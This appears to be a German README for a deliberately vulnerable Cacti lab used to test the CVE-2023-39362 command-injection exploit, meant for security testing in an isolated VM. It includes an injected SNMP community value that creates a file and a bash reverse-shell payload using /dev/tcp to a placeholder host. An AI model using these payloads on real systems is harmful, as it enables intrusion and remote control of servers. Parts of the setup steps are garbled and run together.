
WARNUNG: Dies ist eine verwundbare Anwendung zum Testen des Exploits für die Cacti-Befehlsinjektion (CVE-2023-39362). Führen Sie sie auf eigene Gefahr aus!
Dies ist eine verwundbare Anwendung zum Testen des Exploits für die Cacti-Schwachstelle (CVE-2023-39362).
Diese Anwendung enthält schwerwiegende Sicherheitslücken. Nutzung auf eigene Gefahr! Es wird empfohlen, eine gesicherte und abgeschottete Umgebung zu verwenden (z. B. eine VM mit einem aktuellen Snapshot und Host-only-Netzwerk). Laden Sie diese Anwendung nicht auf Server hoch, die mit dem Internet verbunden sind, da diese kompromittiert werden.
HAFTUNGSAUSSCHLUSS: Ich übernehme keine Verantwortung dafür, wie jemand diese Anwendung nutzt. Der einzige Zweck dieser Anwendung ist es, ein Testszenario für den CVE-2023-39362-Exploit zu sein, und sie sollte nicht böswillig verwendet werden. Wenn Ihr Server durch eine Installation dieser Anwendung kompromittiert wird, liegt das nicht in meiner Verantwortung, sondern in der Verantwortung der Person(en), die sie hochgeladen und installiert haben.
Hier die Schritte zum Einrichten der Umgebung:
docker compose up -d aus, um die Zusammensetzung zu starten.admin/admin.admin an.guest.guest erneut an, um den Exploit auszuprobieren.Der Container wird vuln-cacti genannt.
Der Hostname für ein Test-SNMP-Gerät ist monitored_snmp_device.
Zum Abräumen der Umgebung verwenden Sie den Befehl docker compose down.
Die offizielle Installationsanleitung von Cacti finden Sie hier.
Eine detaillierte Grundursache der Schwachstelle ist in der ursprünglichen Sicherheitsempfehlung oder in meinem Blogbeitrag verfügbar.
(Dies ist nur ein möglicher Exploit)
public\' ; touch /tmp/m3ssap0 ; \'./tmp das Vorhandensein der erstellten Datei.Um eine Reverse Shell zu erhalten, kann ein Payload wie der folgende verwendet werden.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
Dieses Projekt ist unter der Unlicense lizenziert - siehe die Datei LICENSE für Details.